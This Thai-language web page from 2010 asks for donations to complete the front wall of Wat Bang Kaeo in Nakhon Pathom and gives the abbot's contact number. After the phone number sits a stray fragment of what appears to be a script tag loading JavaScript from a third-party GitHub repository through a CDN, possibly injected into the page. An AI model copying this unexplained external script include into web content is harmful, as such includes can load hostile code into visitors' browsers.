ขอเชิญทำบุญร่วมสร้างกำแพง วัดบางแก้ว อ.นครชัยศรี จ.นครปฐม (พระครูพิจิตรสรคุณ (พร) เจ้าอาวาส

 ปิดทองหลังพระ    13 พ.ย. 2553

ขอแจ้งข่าวมายังผู้มีใจบุญใจกุศล ทั้งที่อยู่ใกล้และอยู่ไกล ขณะนี้ทางวัดบางแก้ว กำลังดำเนินการต่อเติม
กำแพงวัดบริเวณด้านหน้าด้านติดกับถนนใกล้กับพระอุโบสถ ซึ่งได้ก่อสร้างค้างเอาไว้มานานเนื่องจากทางวัดยังขาดปัจจัยในการดำเนินการให้แล้วเสร็จซึ่งจะต้องใช้เงินจำนวนมาก ประกอบกับวัดบางแก้วเป็นวัดเล็ก
ๆ และเจ้าอาวาสองค์เดิมได้มรณะภาพไป งานก่อสร้างและงานซ่อมบำรุงรักษาหยุดชะงักไปทุก ๆ อย่าง มา
บัดนี้ ได้เจ้าอาวาสองค์ใหม่แล้วคือ หลวงพ่อพร ท่านก็ได้ดำเนินการซ่อมแซม และบูรณะปฏิสังขรณ์มาอย่างต่อเนื่อง อันไหนที่สำคัญที่สุดก็จะดำเนินการทำก่อนอันไหนรอได้ก็เอาไว้ก่อน มาบัดนี้ถึงเวลาที่จะต้องทำกำแพงวัดด้านหน้าให้แล้วเสร็จเพื่อความปลอดภัย และ สวยงาม ทางวัดเองก็ยังขาดปัจจัยอีกจำนวนมากซึ่ง จะต้องใช้ซื้อ ปูนซีเมนต์ ทราย หิน และจ่ายค่าแรงให้กับผู้รับเหมา จึงขอบอกบุญมายังผู้มีใจบุญ
ใจกุศลที่ต้องการร่วมในกองบุญกองกุศลครั้งนี้กับทางวัดบางแก้ว สามารถติดต่อทำบุญโดยตรงได้ที่
เจ้าอาวาสวัดบางแก้ว พระครูพิจิตรสรคุณ (พร) อ.นครชัยศรี จ.นครปฐม โทร.034331911 https://cdn.jsdelivr.net/gh/tatikers/san/dhamma.js">   
  3,575 

  แสดงความคิดเห็น


RELATED STORIESจีรัง กรุ๊ป    

 ธรรมะไทย